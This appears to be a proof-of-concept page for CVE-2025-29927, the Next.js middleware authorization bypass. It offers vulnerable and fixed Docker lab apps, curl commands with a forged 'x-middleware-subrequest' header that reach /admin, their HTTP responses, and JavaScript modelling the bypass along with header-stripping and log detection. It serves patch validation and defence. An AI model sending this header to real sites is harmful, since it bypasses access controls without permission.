POC details: 4924ef3ceb64230136277a76086f90f6c194e544

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is an open-source React framework from Vercel. Next.js versions before 14.2.25 and before 15.2.3 contain a security vulnerability: when the authorization check is performed in middleware, it can be bypassed.
Description
Reproduction and fix of the CVE-2025-29927 vulnerability.
Introduction
# CVE-2025-29927

Reproduction and fix of the CVE-2025-29927 vulnerability.

```
git clone git@github.com:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
```

In `vulnerable/` there is a version of the application that is vulnerable to the attack. In `fixed/` there is a version of the application that is upgraded to the minimal version that fixes the vulnerability.

> ⚠️ Important: These examples are provided for defenders, researchers, and teams validating patching. Do **not** run these images on public or production networks. Only test on systems you own or where you have explicit written permission.

## Vulnerable version

Reproduction of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
```

### Run the exploit

Run this command; the request should be redirected to the login page:

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command with the forged header; on the vulnerable version it reaches the admin page:

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...
```

## Fixed version

Fix of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
```

### Run the exploit

Run this command; the request should be redirected to the login page:

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command with the forged header; on the fixed version it should now also be redirected to the login page:

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```
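
The two curl runs above show the effect of the `x-middleware-subrequest` header but not the mechanism. The following is an added example, not code from the Bongni/CVE-2025-29927 repository or from Next.js itself. It models the behaviour in plain Node.js: an authorization middleware that guards `/admin`, a dispatch step that skips the middleware once the header names it five times (the recursion guard the header was designed for), an edge-side mitigation that drops the header from inbound requests so the middleware always runs, and a scan over proxy log lines that flags external requests carrying the header. `MIDDLEWARE_NAME`, the request object shape and the JSON log format are assumptions for this example; the sample log lines are constructed.

```javascript
// Added example (not from the repository or from Next.js): models the bypass the README
// demonstrates with curl, plus two defender-side controls.
const MIDDLEWARE_NAME = 'middleware';   // assumed name of the middleware route
const MAX_RECURSION_DEPTH = 5;          // depth at which the vulnerable dispatch skips middleware

// Authorization check performed in middleware: /admin requires a session cookie.
function authMiddleware(req) {
  if (req.path.startsWith('/admin') && !req.cookies.session) {
    return { status: 307, location: '/login' };
  }
  return { status: 200 };
}

// Count how many times the header names our middleware. The header is meant to be internal
// (set by the framework for nested middleware invocations), but nothing stops an external
// client from sending it, which is the root of the issue.
function subrequestDepth(headers) {
  const raw = headers['x-middleware-subrequest'] || '';
  return raw.split(':').filter((name) => name === MIDDLEWARE_NAME).length;
}

// Vulnerable dispatch: once the depth reaches the limit the middleware is not run at all,
// so the authorization check never happens and the page is served.
function vulnerableDispatch(req) {
  if (subrequestDepth(req.headers) >= MAX_RECURSION_DEPTH) {
    return { status: 200, skippedMiddleware: true };
  }
  return authMiddleware(req);
}

// Edge mitigation: a reverse proxy removes the header from every inbound request, so the
// depth the application sees is always 0 and the middleware always runs.
function stripInternalHeaders(headers) {
  const cleaned = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== 'x-middleware-subrequest') cleaned[name] = value;
  }
  return cleaned;
}

function hardenedDispatch(req) {
  return vulnerableDispatch({ ...req, headers: stripInternalHeaders(req.headers) });
}

// Detection: proxy logs (constructed here as JSON lines with request headers recorded) are
// scanned for any external request carrying the header. Malformed lines are skipped.
function findBypassAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; }
    const headers = Object.fromEntries(
      Object.entries(entry.headers || {}).map(([k, v]) => [k.toLowerCase(), v]),
    );
    if ('x-middleware-subrequest' in headers) {
      hits.push({
        ts: entry.ts, ip: entry.ip, path: entry.path,
        depth: subrequestDepth(headers), status: entry.status,
      });
    }
  }
  return hits;
}

// Constructed sample traffic: the two curl requests from the README plus benign noise.
const SAMPLE_LOG = [
  '{"ts":"2025-10-08T22:54:39Z","ip":"203.0.113.7","path":"/admin","status":307,"headers":{"user-agent":"curl/8.5.0"}}',
  '{"ts":"2025-10-08T22:54:41Z","ip":"203.0.113.7","path":"/admin","status":200,"headers":{"user-agent":"curl/8.5.0","x-middleware-subrequest":"middleware:middleware:middleware:middleware:middleware"}}',
  '{"ts":"2025-10-08T22:55:02Z","ip":"198.51.100.3","path":"/login","status":200,"headers":{"user-agent":"Mozilla/5.0"}}',
  'not json at all',
];

// The forged request from the README: no session, header naming the middleware five times.
const forgedRequest = {
  path: '/admin',
  cookies: {},
  headers: { 'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware' },
};

console.log('vulnerable :', vulnerableDispatch(forgedRequest)); // { status: 200, skippedMiddleware: true }
console.log('hardened   :', hardenedDispatch(forgedRequest));   // { status: 307, location: '/login' }
console.log('log hits   :', findBypassAttempts(SAMPLE_LOG));    // one hit, depth 5, from 203.0.113.7
```

Upgrading to the fixed Next.js release is the real remedy, as the `fixed/` directory shows; the header-stripping step is the stopgap for deployments that cannot upgrade immediately, and the log scan gives a way to check whether the header has been arriving from outside in the meantime.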

## References

This repository is based on [l1uk/nextjs-middleware-exploit](https://github.com/l1uk/nextjs-middleware-exploit), but adapted for version 15.x of Next.js.
File snapshot

```
[4.0K] /data/pocs/4924ef3ceb64230136277a76086f90f6c194e544
├── [4.0K] fixed
│   ├── [ 133] Dockerfile
│   ├── [ 523] middleware.js
│   ├── [ 281] package.json
│   ├── [4.0K] pages
│   │   ├── [  63] admin.js
│   │   └── [  63] login.js
│   └── [ 849] README.md
├── [1.0K] LICENSE
├── [2.5K] README.md
└── [4.0K] vulnerable
    ├── [ 133] Dockerfile
    ├── [ 523] middleware.js
    ├── [ 280] package.json
    ├── [4.0K] pages
    │   ├── [  63] admin.js
    │   └── [  63] login.js
    └── [ 923] README.md

5 directories, 14 files
```